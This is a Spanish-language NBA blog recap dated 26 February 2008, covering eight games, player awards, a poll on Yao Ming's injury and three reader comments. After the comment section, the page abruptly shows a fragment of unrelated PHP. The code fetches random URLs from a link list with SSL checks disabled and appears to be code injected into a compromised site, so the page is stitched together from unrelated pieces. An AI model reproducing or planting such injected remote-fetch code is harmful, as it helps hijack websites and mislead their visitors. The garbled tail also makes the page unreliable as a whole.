La crónica (26/02/08)

27 de February de 2008 por MagicJohnson32

Rachas que se amplían, partidos decididos sobre la bocina y más de una sorpresa depararon los 8 encuentros disputados anoche. Veamos un resumen en imágenes antes de la crónica:

La crónica:

yaoscolaintroduction

La noticia del día era la lesión de Yao, como ya os informamos aquí. Sin embargo, los Rockets demostraron que pueden seguir dando guerra y lograron un contundente triunfo sobre los Wizards, a los que asfixiaron en defensa en una primera mitad que acabó 23-51 y acabaron superando por 69-94. Pese al mal partido de McGrady, entre Alston, Scola, Head y Landry aportaron la solvencia ofensiva necesaria, mientras que Mutombo, titular por Ming, comandó la defensa con 4 tapones. Sólo Jamison, Young y Pecherov vieron aro por parte de los Wizards, mientras que el resto de sus compañeros hicieron 9 de 49 en tiros. Los Rockets ya suman 13 victorias seguidas.

marionlayupHedo Turkoglu sigue añadiendo méritos a su magnífica temporada. Anoche anotó 17 puntos en el último cuarto y dio la victoria a los Magic sobre los Nets por 102-92. El turco y Lewis comandaron a su equipo con 25 puntos cada uno mientras Carter y Boone fueron los mejores por New Jersey. De este modo, Orlando abre una brecha de cuatro partidos respecto a Toronto y Cleveland.

Noticia: los Heat ganaron. El retorno de Haslem al quinteto sentó bien a Miami, que, con 7 jugadores por encima de los 10 puntos, se llevaron la victoria ante Sacramento por 86-107 gracias a un parcial de 11-31 en el tercer cuarto y a un gran trabajo defensivo. Por los Kings sólo destacó el novato Hawes con 16 puntos.

En Milwaukee, un espectacular triple sobre la bocina de Michael Redd tumbó por 102-105 a los Cavs de LeBron James, quien apenas cinco segundo antes había empatado el encuentro con una bandeja. James logró 35 puntos y Reddmichaelreddbuzzer se fue a los 25, pero el máximo anotador fue Mo Williams, autor de su mejor marca como profesional con 37. En Memphis, el primer doble-doble de O’Neal como jugador de los Suns y las grandes actuaciones de Nash, Amare, Hll y Diaw dieron la victoria a Phoenix con más problemas de los esperados ante unos Grizzlies que resistieron durante 3 cuartos. Gay logró 36 puntos, Navarro 23 y Warrick, Conley y Milicic hicieron 16, 15 y 15 respectivamente pero un 37-24 en el periodo final dio la victoria a los visitantes por 127-113.

La victoria de los Suns permite a los de Arizona mantenerse a un partido de los Lakers, que consolidaron su liderato de la conferencia al ganar a los Blazers por 96-83. Portland, que jugó sin Roy por lesión, adquirió una renta de 15 puntos en el primer cuarto, pero el conjunto angelino remontó en la segunda mitad con una gran defensa (que limitó a los Blazers a 32 puntos en los últimos 24kobefarmarsashahandsup minutos) y con Bryant, 30 puntos, 9 rebotes y 7 asistencias, y Farmar (21 puntos, mejor marca anotadora de su carrera) liderando el ataque para dar a los Lakers su 40ª victoria de la temporada. Gasol logró 15 puntos, 10 rebotes y 3 tapones, mientras que Aldridge fue el más destacado visitante con 24 puntos.

El Oeste no permite derrotas como las cosechadas por los Jazz el pasado viernes ante Clippers y anoche, por 100-111, ante Timberwolves. Utah cometió 24 pérdidas de balón y en el cuarto final permitió 39 puntos de su rival, unos Wolves que tuvieron a sus cuatro jóvenes esperanzas (Foye, McCants, Gomes y Jefferson) por encima de los 20 puntos. Boozer, con 34, fue el más destacado por parte de los Jazz.

Un problema (que tu único pívot esté lesionado), una solución (Austin Croshere): En la segunda mitad de su partido ante los Sonics, Don Nelson recurrió a Croshere, prácticamente inédito las últimas temporadas, y éste respondió anotando sus 6 lanzamientos para acabar con 14 puntos sin fallo, con 5 rebotes y una asistencia en 22 minutos. Con Monta Ellis de nuevo inspiradísimo en el lanzamiento (14 de 22 para 30 puntos) y Baron Davis rondando el triple doble con 20 puntos, 10 asistencias y 7 robos, los Warriors se anotaron un importante triunfo por 99-105 ante los Sonics, que tuvieron a Collison, Green y Durant por encima de los 20 puntos.crosheresonics

Nuestro MVP: Acabaremos por no nombrar a LeBron James en este apartido y darlo como supuesto porque lo suyo no tiene nombre, aunque al menos en el mismo partido ha habido un jugador que se ha acercado a sus números. Se trata de Mo Williams, clave en la victoria de los Bucks con 37 puntos, 7 rebotes y 6 asistencias. Otro que ha tenido una actuación completa ha sido Kobe Bryant anotando 30 puntos, repartiendo 7 asistencias y recogiendo 9 rebotes. Rudy Gay, Monta Ellis y Carlos Boozer han pasado también de los 30 puntos.

El rookie: Jornada destacada para los rookies. 21 puntos de Jeff Green y Kevin Durant, 18 de Spencer Hawes y 23 de Navarro, buenos partidos de Carl Landry y Luis Scola, que aprovecharán sin duda la ausencia de Yao Ming, y finalmente, Nick Young y Oleksey Pecherov han sido los únicos jugadores que se han salvado del horrible partido de los Wizards.

La sorpresa: Josh Boone y Joe Smith no dejan de demostrar que son grandes jugadores de equipo pero hoy hay que celebrar la vuelta de Luke Ridnour (con 15 asistencias para aprovechar la baja de Watson) y Boris Diaw (15-11-7). Además es lícito destacar el fenomenal partido de los Wolves con 4 jugadores por encima de los 20 puntos. Aunque tal vez la mayor sorpresa haya sido la aportación fundamental de Austin Croshere en la victoria de los Warriors.

La decepción: Horrible partido de los Wizards en general (69 puntos) y de Andray Blatche y DeShawn Stevenson en particular, 4 de 25 entre los 2. Tampoco Jameer Nelson, Yi Jianlian, Ron Artest ni Andrei Kirilenko han tenido un buen día.yaofaceinjury

Encuesta: ¿Cómo afectará la lesión de Yao Ming a los Rockets?

A) Nada. Continuarán con su buena línea y superarán la primera ronda de Playoffs.

B) Un poco, pero se clasificarán sin demasiados problemas para los Playoffs.

C) Bastante, sufrirán para clasificarse y caerán en primera ronda.

D) Mucho, no entrarán en los Playoffs.

Acabamos con las 10 mejores jugadas de la noche:

Comenta

3 comentarios a esta entrada

  1. Jabho dice:
    #1

    D, fuera de Play Off… tal como está el Oeste lo van a pagar.

      Citar

  2. MagicJohnson32 dice:
    #2

    Yo estoy más por la C, creo que no lo notarán tanto como puede pensarse. En ataque sí, salvo que McGrady se entone mucho, pero en defensa van a dar buen nivel, que Mutombo sigue siendo un monstruo y Yao no era desequilibrante en ese aspecto.

      Citar

  3. Olafur dice:
    #3

    Ojala y me equivoque pero estará más cerca de la D que de la C

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>